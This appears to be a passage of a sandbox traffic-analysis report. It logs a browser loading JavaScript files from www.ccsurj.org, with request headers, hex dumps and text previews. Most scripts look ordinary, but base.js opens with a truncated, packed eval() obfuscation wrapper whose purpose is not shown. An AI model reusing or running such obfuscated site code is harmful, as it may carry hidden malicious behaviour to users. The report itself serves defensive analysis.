                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:56 UTC324INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:56 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 95
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          ETag: "6780c675-5f"
                                          Expires: Tue, 11 Feb 2025 00:16:56 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:56 UTC95INData Raw: 2f 2a 0d 0a 20 2a 20 2d 2d 20 67 72 61 79 73 63 61 6c 65 2e 6a 73 20 2d 2d 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4a 61 6d 65 73 20 50 61 64 6f 6c 73 65 79 20 28 68 74 74 70 3a 2f 2f 6a 61 6d 65 73 2e 70 61 64 6f 6c 73 65 79 2e 63 6f 6d 29 0d 0a 20 2a 0d 0a 20 2a 2f
                                          Data Ascii: /* * -- grayscale.js -- * Copyright (C) James Padolsey (http://james.padolsey.com) * */


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.449749154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:56 UTC548OUTGET /system/resource/js/vsbscreen.min.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:56 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:56 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 3347
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-d13"
                                          Expires: Tue, 11 Feb 2025 00:16:56 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:56 UTC3347INData Raw: 76 61 72 20 5f 76 73 62 5f 6d 75 6c 74 69 73 63 72 65 65 6e 3b 69 66 28 74 79 70 65 6f 66 28 5f 76 73 62 5f 6d 75 6c 74 69 73 63 72 65 65 6e 29 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 76 61 72 20 5f 76 73 62 5f 6d 75 6c 74 69 73 63 72 65 65 6e 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 64 3d 74 68 69 73 3b 76 61 72 20 61 3d 22 76 73 62 5f 73 63 72 65 65 6e 5f 73 65 74 5f 64 65 76 69 63 65 22 3b 76 61 72 20 6b 3d 22 76 73 62 5f 73 63 72 65 65 6e 5f 72 65 6c 6f 61 64 5f 63 6f 75 6e 74 22 3b 76 61 72 20 62 3d 33 30 30 3b 76 61 72 20 67 3d 32 3b 76 61 72 20 68 3d 22 76 73 62 5f 73 63 72 65 65 6e 5f 72 65 6c 6f 61 64 5f 75 72 6c 22 3b 76 61 72 20 69 3d 33 30 3b 76 61 72 20 65 3d 22 5f 76 73 62 73 63 72 65 65 6e 22 3b 76 61 72 20 63 3d 22
                                          Data Ascii: var _vsb_multiscreen;if(typeof(_vsb_multiscreen)=="undefined"){var _vsb_multiscreen=new function(){var d=this;var a="vsb_screen_set_device";var k="vsb_screen_reload_count";var b=300;var g=2;var h="vsb_screen_reload_url";var i=30;var e="_vsbscreen";var c="


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.449750154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:57 UTC542OUTGET /system/resource/js/counter.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:58 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:57 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1329
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-531"
                                          Expires: Tue, 11 Feb 2025 00:16:57 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:58 UTC1329INData Raw: ef bb bf 76 61 72 20 5f 6a 73 71 5f 69 6d 61 67 65 20 3d 20 6e 65 77 20 49 6d 61 67 65 28 29 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 6a 73 71 5f 65 6e 63 6f 64 65 28 29 7b 5f 6b 65 79 53 74 72 3d 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 3b 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 61 3d 3d 22 22 29 72 65 74 75 72 6e 22 22 3b 76 61 72 20 62 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 76 61 72 20 63 2c 63 68 72 32 2c 63 68 72 33 3b 76 61 72 20 64 2c 65 6e 63 32 2c 65 6e 63 33 2c 65 6e 63 34 3b 76 61
                                          Data Ascii: var _jsq_image = new Image();function _jsq_encode(){_keyStr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";this.encode=function(a){if(a==null||a==undefined||a=="")return"";var b=new Array();var c,chr2,chr3;var d,enc2,enc3,enc4;va


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.449751154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:57 UTC528OUTGET /@public/base.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:58 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:57 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 2363
                                          Last-Modified: Sat, 11 Jan 2025 07:29:15 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "67821dcb-93b"
                                          Expires: Tue, 11 Feb 2025 00:16:57 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:58 UTC2363INData Raw: 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 64 29 7b 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 28 63 3c 61 3f 22 22 3a 65 28 70 61 72 73 65 49 6e 74 28 63 2f 61 29 29 29 2b 28 28 63 3d 63 25 61 29 3e 33 35 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 63 2b 32 39 29 3a 63 2e 74 6f 53 74 72 69 6e 67 28 33 36 29 29 7d 3b 69 66 28 21 27 27 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 64 5b 65 28 63 29 5d 3d 6b 5b 63 5d 7c 7c 65 28 63 29 3b 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 5b 65 5d 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5c 5c 77 2b 27 7d 3b 63 3d 31 3b 7d 3b 77 68 69 6c 65 28 63 2d
                                          Data Ascii: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c-


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.449753154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:57 UTC550OUTGET /system/resource/js/calendar/simple.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:58 UTC351INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:57 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 9191
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-23e7"
                                          Expires: Tue, 11 Feb 2025 00:16:57 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:58 UTC9191INData Raw: 66 75 6e 63 74 69 6f 6e 20 53 69 6d 70 6c 65 5f 43 61 6c 65 6e 64 61 72 28 29 0d 0a 7b 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 43 61 6c 65 6e 64 61 72 44 61 74 61 3d 6e 65 77 20 20 20 20 41 72 72 61 79 28 32 30 29 3b 20 20 20 20 20 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 6d 61 64 64 3d 6e 65 77 20 20 20 20 41 72 72 61 79 28 31 32 29 3b 20 20 20 20 20 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 54 68 65 44 61 74 65 3d 6e 65 77 20 20 20 20 44 61 74 65 28 29 3b 20 20 20 20 20 0d 0a 20 20 20 76 61 72 20 20 20 20 63 61 6c 5f 43 61 6c 65 6e 64 61 72 74 67 53 74 72 69 6e 67 3d 22 e7 94 b2 e4 b9 99 e4 b8 99 e4 b8 81 e6 88 8a e5 b7 b1 e5 ba 9a e8 be 9b e5 a3 ac e7 99 b8 22
                                          Data Ascii: function Simple_Calendar(){ var cal_CalendarCalendarData=new Array(20); var cal_Calendarmadd=new Array(12); var cal_CalendarTheDate=new Date(); var cal_CalendartgString=""


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.449756154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:57 UTC361OUTGET /js/jquery.SuperSlide.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:58 UTC352INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:58 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 11020
                                          Last-Modified: Fri, 10 Jan 2025 07:04:19 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c673-2b0c"
                                          Expires: Tue, 11 Feb 2025 00:16:58 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:58 UTC11020INData Raw: ef bb bf 0d 0a 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 66 6e 2e 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 73 6c 69 64 65 2e 64 65 66 61 75 6c 74 73 3d 7b 74 79 70 65 3a 22 73 6c 69 64 65 22 2c 65 66 66 65 63 74 3a 22 66 61 64 65 22 2c 61 75 74 6f 50 6c 61 79 3a 21 31 2c 64 65 6c 61 79 54 69 6d 65 3a 35 30 30 2c 69 6e 74 65 72 54 69 6d 65 3a 32 35 30 30 2c 74 72 69 67 67 65 72 54 69 6d 65 3a 31 35 30 2c 64 65 66 61 75 6c 74 49 6e 64 65 78 3a 30 2c 74 69 74 43 65 6c 6c 3a 22 2e 68 64 20 6c 69 22 2c 6d 61 69 6e 43 65 6c 6c 3a 22 2e 62 64 22 2c 74 61 72 67 65 74 43 65 6c 6c 3a 6e 75 6c 6c 2c 74 72 69 67 67 65 72 3a 22 6d 6f 75 73 65 6f 76 65 72 22 2c 73 63 72 6f 6c 6c 3a 31 2c 76 69 73 3a 31 2c 74 69
                                          Data Ascii: !function(a){a.fn.slide=function(b){return a.fn.slide.defaults={type:"slide",effect:"fade",autoPlay:!1,delayTime:500,interTime:2500,triggerTime:150,defaultIndex:0,titCell:".hd li",mainCell:".bd",targetCell:null,trigger:"mouseover",scroll:1,vis:1,ti


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.449754154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:57 UTC358OUTGET /sitegray/sitegray.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:58 UTC324INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:58 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 95
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          ETag: "6780c675-5f"
                                          Expires: Tue, 11 Feb 2025 00:16:58 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:58 UTC95INData Raw: 2f 2a 0d 0a 20 2a 20 2d 2d 20 67 72 61 79 73 63 61 6c 65 2e 6a 73 20 2d 2d 0d 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4a 61 6d 65 73 20 50 61 64 6f 6c 73 65 79 20 28 68 74 74 70 3a 2f 2f 6a 61 6d 65 73 2e 70 61 64 6f 6c 73 65 79 2e 63 6f 6d 29 0d 0a 20 2a 0d 0a 20 2a 2f
                                          Data Ascii: /* * -- grayscale.js -- * Copyright (C) James Padolsey (http://james.padolsey.com) * */


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.449755154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:57 UTC373OUTGET /system/resource/js/vsbscreen.min.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:58 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:58 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 3347
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-d13"
                                          Expires: Tue, 11 Feb 2025 00:16:58 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:58 UTC3347INData Raw: 76 61 72 20 5f 76 73 62 5f 6d 75 6c 74 69 73 63 72 65 65 6e 3b 69 66 28 74 79 70 65 6f 66 28 5f 76 73 62 5f 6d 75 6c 74 69 73 63 72 65 65 6e 29 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 76 61 72 20 5f 76 73 62 5f 6d 75 6c 74 69 73 63 72 65 65 6e 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 64 3d 74 68 69 73 3b 76 61 72 20 61 3d 22 76 73 62 5f 73 63 72 65 65 6e 5f 73 65 74 5f 64 65 76 69 63 65 22 3b 76 61 72 20 6b 3d 22 76 73 62 5f 73 63 72 65 65 6e 5f 72 65 6c 6f 61 64 5f 63 6f 75 6e 74 22 3b 76 61 72 20 62 3d 33 30 30 3b 76 61 72 20 67 3d 32 3b 76 61 72 20 68 3d 22 76 73 62 5f 73 63 72 65 65 6e 5f 72 65 6c 6f 61 64 5f 75 72 6c 22 3b 76 61 72 20 69 3d 33 30 3b 76 61 72 20 65 3d 22 5f 76 73 62 73 63 72 65 65 6e 22 3b 76 61 72 20 63 3d 22
                                          Data Ascii: var _vsb_multiscreen;if(typeof(_vsb_multiscreen)=="undefined"){var _vsb_multiscreen=new function(){var d=this;var a="vsb_screen_set_device";var k="vsb_screen_reload_count";var b=300;var g=2;var h="vsb_screen_reload_url";var i=30;var e="_vsbscreen";var c="


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.449757154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:16:57 UTC350OUTGET /js/jquery.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:16:58 UTC353INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:16:58 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 94792
                                          Last-Modified: Fri, 10 Jan 2025 07:04:20 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c674-17248"
                                          Expires: Tue, 11 Feb 2025 00:16:58 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:16:58 UTC16031INData Raw: 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 75 6e 63 74 69 6f 6e 20 63 79 28 61 29 7b 72 65 74 75 72 6e 20 66 2e 69 73 57 69 6e 64 6f 77 28 61 29 3f 61 3a 61 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 39 3f 61 2e 64 65 66 61 75 6c 74 56 69 65 77 7c 7c 61 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 63 75 28 61 29 7b 69 66 28 21 63 6a 5b 61 5d 29 7b 76 61 72 20 62 3d 63 2e 62 6f 64 79 2c 64 3d 66 28 22 3c 22 2b 61 2b 22 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 62 29 2c 65 3d 64 2e 63 73 73 28 22 64 69 73 70 6c 61 79 22 29 3b 64 2e 72 65 6d 6f 76 65 28 29 3b 69 66 28 65 3d 3d 3d 22 6e 6f 6e 65 22 7c 7c 65 3d 3d 3d 22 22 29 7b 63 6b 7c 7c 28 63 6b 3d 63 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29
                                          Data Ascii: (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe")
                                          2025-01-12 00:16:58 UTC16384INData Raw: 73 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 70 69 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 66 2e 44 65 66 65 72 72 65 64 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 66 2e 65 61 63 68 28 7b 64 6f 6e 65 3a 5b 61 2c 22 72 65 73 6f 6c 76 65 22 5d 2c 66 61 69 6c 3a 5b 62 2c 22 72 65 6a 65 63 74 22 5d 2c 70 72 6f 67 72 65 73 73 3a 5b 63 2c 22 6e 6f 74 69 66 79 22 5d 7d 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 5b 30 5d 2c 65 3d 62 5b 31 5d 2c 67 3b 66 2e 69 73 46 75 6e 63 74 69 6f 6e 28 63 29 3f 69 5b 61 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 3d 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 67 26 26 66 2e 69 73 46 75 6e 63 74 69 6f 6e 28 67 2e 70 72 6f 6d 69 73 65 29 3f 67
                                          Data Ascii: s);return this},pipe:function(a,b,c){return f.Deferred(function(d){f.each({done:[a,"resolve"],fail:[b,"reject"],progress:[c,"notify"]},function(a,b){var c=b[0],e=b[1],g;f.isFunction(c)?i[a](function(){g=c.apply(this,arguments),g&&f.isFunction(g.promise)?g
                                          2025-01-12 00:16:59 UTC16384INData Raw: 0d 0a 61 29 7b 76 61 72 20 62 3d 46 2e 65 78 65 63 28 61 29 3b 62 26 26 28 62 5b 31 5d 3d 28 62 5b 31 5d 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 62 5b 33 5d 3d 62 5b 33 5d 26 26 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 5c 5c 73 29 22 2b 62 5b 33 5d 2b 22 28 3f 3a 5c 5c 73 7c 24 29 22 29 29 3b 72 65 74 75 72 6e 20 62 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 7b 7d 3b 72 65 74 75 72 6e 28 21 62 5b 31 5d 7c 7c 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 5b 31 5d 29 26 26 28 21 62 5b 32 5d 7c 7c 28 63 2e 69 64 7c 7c 7b 7d 29 2e 76 61 6c 75 65 3d 3d 3d 62 5b 32 5d 29 26 26 28 21 62 5b 33 5d 7c 7c 62 5b 33 5d 2e 74 65 73
                                          Data Ascii: a){var b=F.exec(a);b&&(b[1]=(b[1]||"").toLowerCase(),b[3]=b[3]&&new RegExp("(?:^|\\s)"+b[3]+"(?:\\s|$)"));return b},H=function(a,b){var c=a.attributes||{};return(!b[1]||a.nodeName.toLowerCase()===b[1])&&(!b[2]||(c.id||{}).value===b[2])&&(!b[3]||b[3].tes
                                          2025-01-12 00:16:59 UTC16384INData Raw: 65 28 22 68 72 65 66 22 29 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 7d 7d 2c 72 65 6c 61 74 69 76 65 3a 7b 22 2b 22 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 74 79 70 65 6f 66 20 62 3d 3d 22 73 74 72 69 6e 67 22 2c 64 3d 63 26 26 21 6c 2e 74 65 73 74 28 62 29 2c 65 3d 63 26 26 21 64 3b 64 26 26 28 62 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 66 6f 72 28 76 61 72 20 66 3d 30 2c 67 3d 61 2e 6c 65 6e 67 74 68 2c 68 3b 66 3c 67 3b 66 2b 2b 29 69 66 28 68 3d 61 5b 66 5d 29 7b 77 68 69 6c 65 28 28 68 3d 68 2e 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 29 26 26 68 2e 6e 6f 64 65 54 79 70 65 21 3d 3d 31 29 3b 61 5b 66 5d 3d 65
                                          Data Ascii: e("href")},type:function(a){return a.getAttribute("type")}},relative:{"+":function(a,b){var c=typeof b=="string",d=c&&!l.test(b),e=c&&!d;d&&(b=b.toLowerCase());for(var f=0,g=a.length,h;f<g;f++)if(h=a[f]){while((h=h.previousSibling)&&h.nodeType!==1);a[f]=e
                                          2025-01-12 00:16:59 UTC16384INData Raw: 61 3d 66 0d 0a 2e 63 6c 65 61 6e 28 61 72 67 75 6d 65 6e 74 73 29 3b 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 74 68 69 73 2e 74 6f 41 72 72 61 79 28 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 61 2c 22 62 65 66 6f 72 65 22 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 61 66 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 5b 30 5d 26 26 74 68 69 73 5b 30 5d 2e 70 61 72 65 6e 74 4e 6f 64 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 64 6f 6d 4d 61 6e 69 70 28 61 72 67 75 6d 65 6e 74 73 2c 21 31 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 74 68 69 73 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 7d 29 3b 69 66 28 61 72 67 75 6d 65 6e
                                          Data Ascii: a=f.clean(arguments);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,!1,function(a){this.parentNode.insertBefore(a,this.nextSibling)});if(argumen
